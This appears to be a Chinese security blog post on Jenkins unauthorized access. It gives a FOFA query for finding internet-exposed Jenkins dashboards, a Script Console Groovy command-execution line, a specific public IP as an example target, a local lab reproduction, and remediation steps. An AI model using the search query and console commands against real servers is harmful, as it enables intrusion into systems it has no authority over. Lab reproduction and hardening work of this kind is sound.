Jenkins未授权访问漏洞

黑白时光les2024-08-04 15:56

Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

漏洞复现

步骤一:使用以下fofa语法进行产品搜索

复制代码 
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

复制代码 
#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

实在找不到

靶场复现

环境准备

虚拟机centos IP:192.168.30.138

下载安装包,版本1.620.1.1.norach

复制代码 
wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm

安装Jenkins

复制代码 
rpm -ivh jenkins-1.620-1.1.noarch.rpm

启动Jenkins服务

复制代码 
service jenkins start

关闭防火墙或放行8080端口

复制代码 
systemctl stop firewalld.service

访问服务地址

http://192.168.30.138:8080/manage

http://192.168.30.138:8080/script

复制代码 
#执行命令
println "whoami".execute().text


漏洞修复

  1. 升级版本。
  2. 添加认证,设置强密码复杂度及账号锁定。
  3. 禁止把Jenkins直接暴露在公网。
相关推荐
蝎子莱莱爱打怪1 天前
Centos7中一键安装K8s集群以及Rancher安装记录
运维·后端·kubernetes
一次旅行2 天前
网络安全总结
安全·web安全
DianSan_ERP2 天前
电商API接口全链路监控:构建坚不可摧的线上运维防线
大数据·运维·网络·人工智能·git·servlet
呉師傅2 天前
火狐浏览器报错配置文件缺失如何解决#操作技巧#
运维·网络·windows·电脑
不是二师兄的八戒2 天前
Linux服务器挂载OSS存储的完整实践指南
linux·运维·服务器
zhangfeng11332 天前
趋动云 如何ssh登录 服务区 项目server
运维·人工智能·ssh
ZeroNews内网穿透2 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全
失重外太空啦2 天前
nginx
运维·nginx
Gofarlic_oms12 天前
避免Kisssoft高级分析模块过度采购的科学评估方法
大数据·linux·运维·人工智能·matlab
田井中律.2 天前
服务器部署问题汇总(ubuntu24.04.3)
运维·服务器
热门推荐
01GitHub 镜像站点02【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆03OpenClaw 使用和管理 MCP 完全指南04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot08OpenClaw + 飞书(Feishu)环境搭建指南09Window 10部署openclaw报错node.exe : npm error code 12810本地部署 OpenClaw + DeepSeek-R1 完全指南